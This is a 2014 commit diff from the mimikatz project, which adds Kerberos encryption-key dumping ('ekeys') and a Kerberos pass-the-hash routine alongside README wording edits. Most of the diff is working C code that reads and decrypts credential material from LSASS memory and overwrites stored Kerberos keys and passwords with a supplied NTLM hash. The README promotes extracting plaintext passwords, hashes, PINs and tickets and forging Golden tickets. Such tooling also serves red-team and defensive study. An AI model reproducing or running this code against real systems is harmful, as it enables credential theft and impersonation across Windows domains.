Kerberos 'Pass-The-Hash', eKeys

MSV 'Pass-The-Hash' improvements Better Crypto output README update
2005wind · Apr 30, 2014 · 5571133 · 5571133
1 parent 4e6f3e1
commit 5571133
Show file tree

Hide file tree

Showing 10 changed files with 279 additions and 85 deletions.
diff --git a/README.md b/README.md
@@ -2,7 +2,7 @@
 
 **`mimikatz`** is a tool I've made to learn `C` and make somes experiments with Windows security.
 
-It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. **`mimikatz`** also can perform pass-the-hash, pass-the-ticket or build _Golden tickets_.
+It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. **`mimikatz`** can also perform pass-the-hash, pass-the-ticket or build _Golden tickets_.
 
 ```
   .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr  6 2014 22:02:03)
@@ -36,9 +36,9 @@ SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
          * Password : waza1234/
 ...
 ```
-But that's not all! `Crypto`, `Terminal Server`, `Events`, ... lots of informations (in French, _yes_) on http://blog.gentilkiwi.com.
+But that's not all! `Crypto`, `Terminal Server`, `Events`, ... lots of informations in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on http://blog.gentilkiwi.com (in French, _yes_).
 
-If you don't want to build it, binaries are availables on http://blog.gentilkiwi.com/mimikatz
+If you don't want to build it, binaries are availables on https://github.com/gentilkiwi/mimikatz/releases
 
 
 ## Quick usage
@@ -75,7 +75,7 @@ crypto::keys /export
 crypto::keys /machine /export
 ```
 
-### vault && lsadump
+### vault & lsadump
 ```
 vault::cred
 vault::list
@@ -120,4 +120,4 @@ CC BY 3.0 FR licence - http://creativecommons.org/licenses/by/3.0/fr/
 ## Author
 Benjamin DELPY `gentilkiwi`, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com )
 
-This is a **personal** developpement, please respect its philosophy and don't use it for bad things!
+This is a **personal** developpement, please respect its philosophy and don't use it for bad things!
diff --git a/mimikatz/modules/kuhl_m_crypto.c b/mimikatz/modules/kuhl_m_crypto.c
@@ -213,7 +213,7 @@ NTSTATUS kuhl_m_crypto_l_certificates(int argc, wchar_t * argv[])
 	kull_m_string_args_byName(argc, argv, L"store", &szStore, L"My");
 
 	kprintf(L" * System Store  : \'%s\' (0x%08x)\n"
-			L" * Store         : \'%s\'\n",
+			L" * Store         : \'%s\'\n\n",
 			szSystemStore, dwSystemStore,
 			szStore);
 
@@ -230,7 +230,7 @@ NTSTATUS kuhl_m_crypto_l_certificates(int argc, wchar_t * argv[])
 					{
 						if(CertGetNameString(pCertContext, nameSrc[j], 0, NULL, certName, dwSizeNeeded) == dwSizeNeeded)
 						{
-							kprintf(L"\n%2u. %s\n", i, certName);
+							kprintf(L"%2u. %s\n", i, certName);
 
 							dwSizeNeeded = 0;
 							if(CertGetCertificateContextProperty(pCertContext, CERT_KEY_PROV_INFO_PROP_ID, NULL, &dwSizeNeeded))
@@ -273,6 +273,8 @@ NTSTATUS kuhl_m_crypto_l_certificates(int argc, wchar_t * argv[])
 									} else PRINT_ERROR_AUTO(L"CertGetCertificateContextProperty");
 								}
 								LocalFree(pBuffer);
+								if(!export)
+									kprintf(L"\n");
 							}
 
 							if(export)
@@ -554,6 +556,7 @@ void kuhl_m_crypto_exportCert(PCCERT_CONTEXT pCertificate, BOOL havePrivateKey,
 		else
 			PRINT_ERROR_AUTO(L"kuhl_m_crypto_generateFileName");
 	}
+	kprintf(L"\n");
 }
 
 wchar_t * kuhl_m_crypto_generateFileName(const wchar_t * term0, const wchar_t * term1, const DWORD index, const wchar_t * name, const wchar_t * ext)

diff --git a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c
@@ -20,6 +20,7 @@ const KUHL_M_C kuhl_m_c_sekurlsa[] = {
 
 	{kuhl_m_sekurlsa_msv_pth,			L"pth",		L"Pass-the-hash"},
 	{kuhl_m_sekurlsa_kerberos_tickets,	L"tickets",	L"List Kerberos tickets"},
+	{kuhl_m_sekurlsa_kerberos_keys,		L"ekeys",	L"List Kerberos Encryption Keys"},
 	{kuhl_m_sekurlsa_dpapi,				L"dpapi",	L"List Cached MasterKeys"},
 	{kuhl_m_sekurlsa_credman,			L"credman",	L"List Credentials Manager"},
 };
@@ -424,6 +425,8 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
 	PUNICODE_STRING credentials, username = NULL, domain = NULL, password = NULL;
 	PMSV1_0_PRIMARY_CREDENTIAL pPrimaryCreds;
 	PRPCE_CREDENTIAL_KEYCREDENTIAL pRpceCredentialKeyCreds;
+	PKERB_HASHPASSWORD_GENERIC pHashPassword;
+	UNICODE_STRING buffer;
 	PVOID base;
 	DWORD type, i;
 
@@ -478,6 +481,21 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
 				}
 			}
 		}
+		else if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST)
+		{
+			pHashPassword = (PKERB_HASHPASSWORD_GENERIC) mesCreds;
+			kprintf(L"\t %4i : ", pHashPassword->Type);
+			buffer.Buffer = (PWSTR) pHashPassword->Checksump;
+			buffer.Length = buffer.MaximumLength = (USHORT) ((pHashPassword->Size) ? pHashPassword->Size : LM_NTLM_HASH_LENGTH); // will not use CDLocateCSystem, sorry!
+			if(kull_m_string_getUnicodeString(&buffer, cLsass.hLsassMem))
+			{
+				if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
+					(*lsassLocalHelper->pLsaUnprotectMemory)(buffer.Buffer, buffer.MaximumLength);
+				kull_m_string_wprintf_hex(buffer.Buffer, buffer.Length, 0);
+				LocalFree(buffer.Buffer);
+			}
+			kprintf(L"\n");
+		}
 		else
 		{
 			if(mesCreds->UserName.Buffer || mesCreds->Domaine.Buffer || mesCreds->Password.Buffer)

diff --git a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.h b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.h
@@ -34,6 +34,7 @@
 #define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY	0x02000000
 #define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK	0x07000000
 
+#define KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST		0x00200000
 #define KUHL_SEKURLSA_CREDS_DISPLAY_CREDMANPASS		0x00400000
 #define KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE			0x00800000
 

diff --git a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c
@@ -55,6 +55,10 @@ const KERB_INFOS kerbHelper[] = {
 		FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_51, Ticket),
 		FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_51, TicketKvno),
 		sizeof(KIWI_KERBEROS_INTERNAL_TICKET_51),
+		sizeof(LIST_ENTRY) + FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_51, pKeyList),
+		sizeof(KIWI_KERBEROS_KEYS_LIST_5),
+		FIELD_OFFSET(KERB_HASHPASSWORD_5, generic),
+		sizeof(KERB_HASHPASSWORD_5),
 	},
 	{
 		sizeof(LIST_ENTRY) + FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
@@ -83,6 +87,10 @@ const KERB_INFOS kerbHelper[] = {
 		FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_52, Ticket),
 		FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_52, TicketKvno),
 		sizeof(KIWI_KERBEROS_INTERNAL_TICKET_52),
+		sizeof(LIST_ENTRY) + FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, pKeyList),
+		sizeof(KIWI_KERBEROS_KEYS_LIST_5),
+		FIELD_OFFSET(KERB_HASHPASSWORD_5, generic),
+		sizeof(KERB_HASHPASSWORD_5),
 	},
 	{
 		FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
@@ -111,6 +119,10 @@ const KERB_INFOS kerbHelper[] = {
 		FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, Ticket),
 		FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, TicketKvno),
 		sizeof(KIWI_KERBEROS_INTERNAL_TICKET_6),
+		FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, pKeyList),
+		sizeof(KIWI_KERBEROS_KEYS_LIST_6),
+		FIELD_OFFSET(KERB_HASHPASSWORD_6, generic),
+		sizeof(KERB_HASHPASSWORD_6),
 	},
 };
 
@@ -124,29 +136,157 @@ NTSTATUS kuhl_m_sekurlsa_kerberos(int argc, wchar_t * argv[])
 
 void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
 {
-	kuhl_m_sekurlsa_enum_generic_callback_kerberos(pData, NULL);
+	KIWI_KERBEROS_ENUM_DATA data = {kuhl_m_sekurlsa_enum_kerberos_callback_passwords, NULL};
+	kuhl_m_sekurlsa_enum_generic_callback_kerberos(pData, &data);
 }
 
 NTSTATUS kuhl_m_sekurlsa_kerberos_tickets(int argc, wchar_t * argv[])
 {
-	kuhl_m_sekurlsa_enum(kuhl_m_sekurlsa_enum_callback_kerberos_tickets, &argc);
+	KIWI_KERBEROS_ENUM_DATA_TICKET ticketData = {argc, FALSE};
+	KIWI_KERBEROS_ENUM_DATA data = {kuhl_m_sekurlsa_enum_kerberos_callback_tickets, &ticketData};
+	kuhl_m_sekurlsa_enum(kuhl_m_sekurlsa_enum_callback_kerberos_generic, &data);
 	return STATUS_SUCCESS;
 }
 
-BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_kerberos_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData)
+NTSTATUS kuhl_m_sekurlsa_kerberos_keys(int argc, wchar_t * argv[])
 {
-	kuhl_m_sekurlsa_enum_generic_callback_kerberos(pData, pOptionalData);
+	KIWI_KERBEROS_ENUM_DATA data = {kuhl_m_sekurlsa_enum_kerberos_callback_keys, NULL};
+	kuhl_m_sekurlsa_enum(kuhl_m_sekurlsa_enum_callback_kerberos_generic, &data);
+	return STATUS_SUCCESS;
+}
+
+BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_kerberos_generic(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData)
+{
+	kuhl_m_sekurlsa_enum_generic_callback_kerberos(pData, (PKIWI_KERBEROS_ENUM_DATA) pOptionalData);
 	return TRUE;
 }
 
-const wchar_t * KUHL_M_SEKURLSA_KERBEROS_TICKET_TYPE[] = {L"Ticket Granting Service", L"Client Ticket ?", L"Ticket Granting Ticket",};
-void kuhl_m_sekurlsa_enum_generic_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData)
+void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_passwords(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS LocalKerbSession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData)
 {
-	KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
-	KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
 	UNICODE_STRING pinCode;
+	KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
+	KULL_M_MEMORY_ADDRESS aLocalMemory = {&pinCode, &hLocalMemory}, aLsassMemory = {*(PUNICODE_STRING *) ((PBYTE) LocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetPin), pData->cLsass->hLsassMem};
+
+	kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) LocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetCreds), pData->LogonId, 0);
+	if(aLsassMemory.address)
+		if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(UNICODE_STRING)))
+			kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &pinCode, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE | ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_VISTA) ? KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT : 0));
+}
+
+const wchar_t * KUHL_M_SEKURLSA_KERBEROS_TICKET_TYPE[] = {L"Ticket Granting Service", L"Client Ticket ?", L"Ticket Granting Ticket",};
+void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS Localkerbsession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData)
+{
+	PKIWI_KERBEROS_ENUM_DATA_TICKET ticketData = (PKIWI_KERBEROS_ENUM_DATA_TICKET) pOptionalData;
 	DWORD i;
+	kuhl_m_sekurlsa_printinfos_logonData(pData);
+	for(i = 0; i < 3; i++)
+	{
+		kprintf(L"\n\tGroup %u - %s", i, KUHL_M_SEKURLSA_KERBEROS_TICKET_TYPE[i]);
+		kuhl_m_sekurlsa_kerberos_enum_tickets(pData, i, (PBYTE) RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetTickets[i], ticketData->isTicketExport);
+		kprintf(L"\n");
+	}
+}
+
+void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_keys(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS Localkerbsession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData)
+{
+	DWORD i, nbHash;
+	KULL_M_MEMORY_ADDRESS aLocalKeyMemory = {NULL, Localkerbsession.hMemory}, aLocalHashMemory = {NULL, Localkerbsession.hMemory};
+	if(RemoteLocalKerbSession.address =  *(PVOID *) ((PBYTE) Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetKeyList))
+	{
+		kuhl_m_sekurlsa_printinfos_logonData(pData);
+		kprintf(L"\n\tKey List @ %p\n", RemoteLocalKerbSession.address);
+		if(aLocalKeyMemory.address = LocalAlloc(LPTR,  kerbHelper[KerbOffsetIndex].structKeyListSize))
+		{
+			if(kull_m_memory_copy(&aLocalKeyMemory, &RemoteLocalKerbSession, kerbHelper[KerbOffsetIndex].structKeyListSize))
+			{
+				if(nbHash = ((DWORD *)(aLocalKeyMemory.address))[1])
+				{
+					RemoteLocalKerbSession.address = (PBYTE) RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].structKeyListSize;
+					i = nbHash * (DWORD) kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize;
+					if(aLocalHashMemory.address = LocalAlloc(LPTR, i))
+					{
+						if(kull_m_memory_copy(&aLocalHashMemory, &RemoteLocalKerbSession, i))
+							for(i = 0; i < nbHash; i++)
+								kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) aLocalHashMemory.address + i * kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize + kerbHelper[KerbOffsetIndex].offsetHashGeneric), pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST | ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_VISTA) ? KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT : 0));
+						LocalFree(aLocalHashMemory.address);
+					}
+				}
+			}
+			LocalFree(aLocalKeyMemory.address);
+		}
+	}
+}
+
+void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_pth(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS Localkerbsession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData)
+{
+	PMSV1_0_PTH_DATA pthData = (PMSV1_0_PTH_DATA) pOptionalData;
+	DWORD i, nbHash;
+	BYTE ntlmHash[LM_NTLM_HASH_LENGTH];
+	UNICODE_STRING nullPasswd = {0, 0, NULL};
+	KULL_M_MEMORY_ADDRESS aLocalKeyMemory = {NULL, Localkerbsession.hMemory}, aLocalHashMemory = {NULL, Localkerbsession.hMemory}, aLocalNTLMMemory = {ntlmHash, Localkerbsession.hMemory}, aLocalPasswdMemory = {&nullPasswd, Localkerbsession.hMemory}, aRemotePasswdMemory = {(PBYTE) RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetCreds + FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password), RemoteLocalKerbSession.hMemory};
+	PKERB_HASHPASSWORD_GENERIC pHash;
+
+	if(RemoteLocalKerbSession.address =  *(PVOID *) ((PBYTE) Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetKeyList))
+	{
+		if(aLocalKeyMemory.address = LocalAlloc(LPTR,  kerbHelper[KerbOffsetIndex].structKeyListSize))
+		{
+			if(kull_m_memory_copy(&aLocalKeyMemory, &RemoteLocalKerbSession, kerbHelper[KerbOffsetIndex].structKeyListSize))
+			{
+				if(nbHash = ((DWORD *)(aLocalKeyMemory.address))[1])
+				{
+					RemoteLocalKerbSession.address = (PBYTE) RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].structKeyListSize;
+					i = nbHash * (DWORD) kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize;
+					if(aLocalHashMemory.address = LocalAlloc(LPTR, i))
+					{
+						if(kull_m_memory_copy(&aLocalHashMemory, &RemoteLocalKerbSession, i))
+						{
+							kprintf(L"Data copy Kerberos @ %p (%u hash) :", RemoteLocalKerbSession.address, nbHash);
+							for(i = 0, pthData->isReplaceOk = TRUE; (i < nbHash) && pthData->isReplaceOk; i++)
+							{
+								kprintf(L" ");
+								pHash = (PKERB_HASHPASSWORD_GENERIC) ((PBYTE) aLocalHashMemory.address + i * kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize + kerbHelper[KerbOffsetIndex].offsetHashGeneric);
+								RemoteLocalKerbSession.address = pHash->Checksump;
+								RtlCopyMemory(aLocalNTLMMemory.address, pthData->NtlmHash, LM_NTLM_HASH_LENGTH);
+								if(pData->cLsass->osContext.BuildNumber >= KULL_M_WIN_BUILD_VISTA)
+									(*pData->lsassLocalHelper->pLsaProtectMemory)(aLocalNTLMMemory.address, LM_NTLM_HASH_LENGTH);
+								if(pthData->isReplaceOk = kull_m_memory_copy(&RemoteLocalKerbSession, &aLocalNTLMMemory, pHash->Size ? (min(pHash->Size, LM_NTLM_HASH_LENGTH)) : LM_NTLM_HASH_LENGTH)) // ok not fair-play with AES-* and old CRC =)
+									kprintf(L"%u", i+1);
+								else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
+							}
+							if(pthData->isReplaceOk && ((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetCreds))->Password.Buffer)
+							{
+								kprintf(L" ");
+								if(pthData->isReplaceOk = kull_m_memory_copy(&aRemotePasswdMemory, &aLocalPasswdMemory, sizeof(UNICODE_STRING)))
+									kprintf(L"OK!", aRemotePasswdMemory.address);
+								else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
+							}
+						}
+						LocalFree(aLocalHashMemory.address);
+					}
+				}
+			}
+			LocalFree(aLocalKeyMemory.address);
+		}
+	}
+}
+
+BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_kerberos_pth(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData)
+{
+	PMSV1_0_PTH_DATA pthData = (PMSV1_0_PTH_DATA) pOptionalData;
+	KIWI_KERBEROS_ENUM_DATA data = {kuhl_m_sekurlsa_enum_kerberos_callback_pth, pthData};
+	if(RtlEqualLuid(pData->LogonId, pthData->LogonId))
+	{
+		kuhl_m_sekurlsa_enum_generic_callback_kerberos(pData, &data);
+		return FALSE;
+	}
+	else return TRUE;
 
+}
+
+void kuhl_m_sekurlsa_enum_generic_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKIWI_KERBEROS_ENUM_DATA pEnumData)
+{
+	KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
+	KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
 	if(kuhl_m_sekurlsa_kerberos_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_kerberos_package.Module, KerberosReferences, sizeof(KerberosReferences) / sizeof(KULL_M_PATCH_GENERIC), &KerbLogonSessionListOrTable, NULL, &KerbOffsetIndex))
 	{
 		aLsassMemory.address = KerbLogonSessionListOrTable;
@@ -160,36 +300,13 @@ void kuhl_m_sekurlsa_enum_generic_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGO
 			if(aLocalMemory.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structSize))
 			{
 				if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, kerbHelper[KerbOffsetIndex].structSize))
-				{
-					if(pOptionalData) // ticket mode
-					{
-						kuhl_m_sekurlsa_printinfos_logonData(pData);
-
-						for(i = 0; i < 3; i++)
-						{
-							kprintf(L"\n\tGroup %u - %s", i, KUHL_M_SEKURLSA_KERBEROS_TICKET_TYPE[i]);
-							kuhl_m_sekurlsa_kerberos_enum_tickets(pData, i, (PBYTE) aLsassMemory.address + kerbHelper[KerbOffsetIndex].offsetTickets[i], *(int *) pOptionalData);
-							kprintf(L"\n");
-						}
-					}
-					else // password mode
-					{
-						kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) aLocalMemory.address + kerbHelper[KerbOffsetIndex].offsetCreds), pData->LogonId, 0);
-						if(aLsassMemory.address = (*(PUNICODE_STRING *) ((PBYTE) aLocalMemory.address + kerbHelper[KerbOffsetIndex].offsetPin)))
-						{
-							aLocalMemory.address = &pinCode;
-							if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(UNICODE_STRING)))
-								kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &pinCode, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE | ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_VISTA) ? KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT : 0));
-						}
-					}
-				}
+					pEnumData->callback(pData, aLocalMemory, aLsassMemory, pEnumData->optionalData);
 				LocalFree(aLocalMemory.address);
 			}
 		}
 	} else kprintf(L"KO");
 }
 
-
 void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN DWORD grp, IN PVOID tickets, IN BOOL isFile)
 {
 	PVOID pStruct, pRef = tickets;